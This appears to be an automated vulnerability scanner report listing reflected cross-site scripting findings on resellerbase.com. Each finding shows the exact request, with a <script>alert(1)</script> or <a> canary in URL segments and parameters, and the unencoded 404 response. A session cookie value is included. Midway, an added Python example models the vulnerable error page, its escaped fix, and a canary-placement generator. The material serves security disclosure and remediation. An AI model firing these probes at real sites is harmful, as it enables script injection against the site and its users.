Date: Wed, 17 Nov 2010 23:10:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/ratingb3853<script>alert(1)</script>9ede5493c6b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2224. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 28254<script>alert(1)</script>45d51176315 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/search.php28254<script>alert(1)</script>45d51176315?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php28254<script>alert(1)</script>45d51176315?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2225. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5a35b<a>cf27b782e83 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search5a35b<a>cf27b782e83&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search5a35b<a>cf27b782e83&opt=2 was not found on this server.</p>
...[SNIP]...

2.2226. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bc061<a>0e47c119038 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...bc061<a>0e47c119038&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...bc061<a>0e47c119038&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2227. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc557<script>alert(1)</script>bd88a405c7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cc557<script>alert(1)</script>bd88a405c7f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cc557<script>alert(1)</script>bd88a405c7f=1 was not found on this server.</p>
...[SNIP]...

2.2228. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d548f<a>71e461b7185 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d548f<a>71e461b7185 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d548f<a>71e461b7185 was not found on this server.</p>
...[SNIP]...

2.2229. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8998<script>alert(1)</script>152334726ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8998<script>alert(1)</script>152334726ce/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8998<script>alert(1)</script>152334726ce/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2230. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9540<script>alert(1)</script>863e21e1eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31f9540<script>alert(1)</script>863e21e1eac/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31f9540<script>alert(1)</script>863e21e1eac/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2231. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee4ba<script>alert(1)</script>20a2fc60822 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesee4ba<script>alert(1)</script>20a2fc60822/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesee4ba<script>alert(1)</script>20a2fc60822/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2232. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 73d29<script>alert(1)</script>ae53554de42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos73d29<script>alert(1)</script>ae53554de42/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos73d29<script>alert(1)</script>ae53554de42/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2233. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 12351<script>alert(1)</script>f1019051a3c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images12351<script>alert(1)</script>f1019051a3c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images12351<script>alert(1)</script>f1019051a3c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2234. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6a7fd<script>alert(1)</script>c29e4648d1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/search.php6a7fd<script>alert(1)</script>c29e4648d1f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php6a7fd<script>alert(1)</script>c29e4648d1f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2235. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1ed09<a>58df6b5c5af was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1ed09<a>58df6b5c5af&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1ed09<a>58df6b5c5af&opt=2 was not found on this server.</p>
...[SNIP]...

2.2236. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 45991<a>a72438db2ed was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...45991<a>a72438db2ed&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...45991<a>a72438db2ed&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2237. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4aabe<script>alert(1)</script>72ba37a4b93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4aabe<script>alert(1)</script>72ba37a4b93=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4aabe<script>alert(1)</script>72ba37a4b93=1 was not found on this server.</p>
...[SNIP]...
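
Findings 2.2237 through 2.2257 share one sink. Every request in this run returns the site's custom 404 page, and that page writes the requested URL into its body text without encoding it, so a canary placed in any path segment ("REST URL parameter N"), in any query value, or in the name of an extra parameter comes back between tags unchanged. The Python below is an added example, not code from resellerbase.com or from the scanner that produced this report: it models that error page in its reflecting form beside a hardened form, and generates the same set of canary placements the scanner used so both renderings can be compared on the report's own URLs. The template string and the function names are assumptions about the target's handler, not its source.

```python
"""Model of the reflected XSS sink behind findings 2.2237-2.2257 (added example,
not the target's or the scanner's code): a custom 404 page that writes the raw
request URI into the page body, beside the hardened rendering, plus a generator
for the canary placements the report exercised."""

from html import escape
from urllib.parse import urlsplit

# Constructed template mirroring the <p> line in the report's 404 responses.
TEMPLATE = "<p>The requested URL {uri} was not found on this server.</p>"


def render_404_vulnerable(request_uri: str) -> str:
    """Reflects the request URI unmodified, as the captured responses do."""
    return TEMPLATE.format(uri=request_uri)


def render_404_hardened(request_uri: str) -> str:
    """Entity-encodes the URI for an HTML text context before writing it.
    quote=True also encodes quotes, so the output would be safe in an attribute too."""
    return TEMPLATE.format(uri=escape(request_uri, quote=True))


def probe_placements(request_uri: str, token: str) -> dict:
    """Return {label: mutated_uri} with the token appended at each position the
    report used: every path segment ("REST URL parameter N"), every query value
    ("<name> parameter") and the name of an extra parameter."""
    parts = urlsplit(request_uri)
    path, query = parts.path, parts.query
    trailing = "/" if path.endswith("/") and len(path) > 1 else ""
    segments = [s for s in path.split("/") if s]
    suffix = "?" + query if query else ""
    placements = {}
    for i in range(len(segments)):
        mutated = list(segments)
        mutated[i] = segments[i] + token
        placements[f"REST URL parameter {i + 1}"] = "/" + "/".join(mutated) + trailing + suffix
    pairs = [tuple(p.partition("=")[::2]) for p in query.split("&")] if query else []
    for i, (name, value) in enumerate(pairs):
        mutated = list(pairs)
        mutated[i] = (name, value + token)
        placements[f"{name} parameter"] = path + "?" + "&".join(f"{n}={v}" for n, v in mutated)
    extra = (query + "&" if query else "") + token + "=1"
    placements["name of an arbitrarily supplied request parameter"] = path + "?" + extra
    return placements


def audit(request_uri: str, token: str = "<script>alert(1)</script>") -> dict:
    """For each placement, record whether the token survives verbatim in the
    vulnerable and in the hardened rendering."""
    report = {}
    for label, uri in probe_placements(request_uri, token).items():
        report[label] = {
            "vulnerable": token in render_404_vulnerable(uri),
            "hardened": token in render_404_hardened(uri),
        }
    return report


if __name__ == "__main__":
    # The URL from findings 2.2239-2.2247, with the scanner's canary shape.
    url = "/detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2"
    for label, outcome in audit(url).items():
        print(f"{label:55s} vulnerable={outcome['vulnerable']!s:5s} hardened={outcome['hardened']}")
```

The hardened renderer encodes for the HTML text context; in the PHP 5.2 that the response headers advertise, the equivalent is htmlspecialchars($uri, ENT_QUOTES, 'UTF-8'), and passing the charset explicitly matters on that version because its default is ISO-8859-1. One caveat when rating these findings: the scanner sent literal < and > in the request line. A browser that percent-encodes those characters (current browsers do, in both path and query) would deliver %3Cscript%3E instead, which a page that prints the raw request target would echo harmlessly, so confirm delivery against the browsers that matter before treating every one of these as trivially exploitable; the missing encoding still has to be fixed.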

2.2238. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6002a<a>f20a6e6e27f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26002a<a>f20a6e6e27f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26002a<a>f20a6e6e27f was not found on this server.</p>
...[SNIP]...

2.2239. http://www.resellerbase.com/detail/31/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3afea<script>alert(1)</script>2bddb0a542f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3afea<script>alert(1)</script>2bddb0a542f/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
